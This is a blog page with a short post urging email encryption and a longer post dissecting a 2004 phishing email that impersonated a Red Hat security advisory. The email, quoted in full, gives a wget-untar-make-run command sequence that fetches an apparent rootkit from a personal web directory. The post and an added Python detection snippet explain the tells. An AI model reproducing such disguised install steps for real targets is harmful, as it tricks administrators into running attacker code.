Sun, 13 Nov 2005

A Meme That Isn't A Waste of Your Time

Sven-S. Porst challenged me to talk about email encryption (PGP, S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.

First, if you’re using Apple Mail, there’s a really friendly guide to getting it set up. Otherwise, the Wikipedia entries for S/MIME and PGP might be worth checking.

:: 21:19
:: /tech/computers/security | [+]

Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:


logo

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ’nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let's be careful out there!
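
The two tells listed above can be checked mechanically at the mail gateway. The following is an added example, not part of the original post: it compares the relay recorded in the topmost Received header and the download link against the domain in From. The sample message is constructed from the header and link quoted above; its From address is an assumption (the post does not show it), and the function and finding names are hypothetical.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: Received header and wget link as quoted in the post.
# The From: address is an assumption; the post does not show that header.
SAMPLE = (
    "Received: from mail.forcartex.com.tw (unknown [211.22.18.59])\n"
    "\tby samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39\n"
    "\tfor daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)\n"
    "From: RedHat Security Team <security@redhat.com>\n"
    "\n"
    "First download the patch from the Stanford RedHat mirror:\n"
    "wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz\n"
)

# Postfix writes "from <HELO name> (<reverse-DNS name> [<peer IP>])".
# The HELO name is supplied by the sender; the reverse-DNS name and IP are
# recorded by the receiving MTA, so only those two are compared.
RECEIVED_RE = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9.]+)\]\)", re.I)
URL_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})(/\S*)", re.I)

def under(host, domain):
    """True if host is the domain itself or a subdomain of it."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)

def check_message(raw):
    """Return (finding, detail) tuples for a single-part plain-text message."""
    msg = message_from_string(raw)
    claimed = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    findings = []
    # The topmost Received header is the one our own server added.
    received = msg.get_all("Received", [])
    if received:
        m = RECEIVED_RE.search(" ".join(received[0].split()))
        if m:
            helo, rdns, ip = m.groups()
            if not under(rdns, claimed):
                findings.append(("relay-not-sender-domain", f"{helo} ({rdns} [{ip}])"))
    body = msg.get_payload() if not msg.is_multipart() else ""
    for host, path in URL_RE.findall(body):
        if not under(host, claimed):
            findings.append(("offsite-download", host))
        if path.startswith("/~"):  # per-user home directory, not a vendor mirror
            findings.append(("user-dir-download", host + path))
    return findings
```

A relay mismatch alone is common for legitimate mail sent through third-party providers; it is the combination with an off-site, per-user download link that makes this message stand out.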

:: 23:55
:: /tech/computers/security | [+]



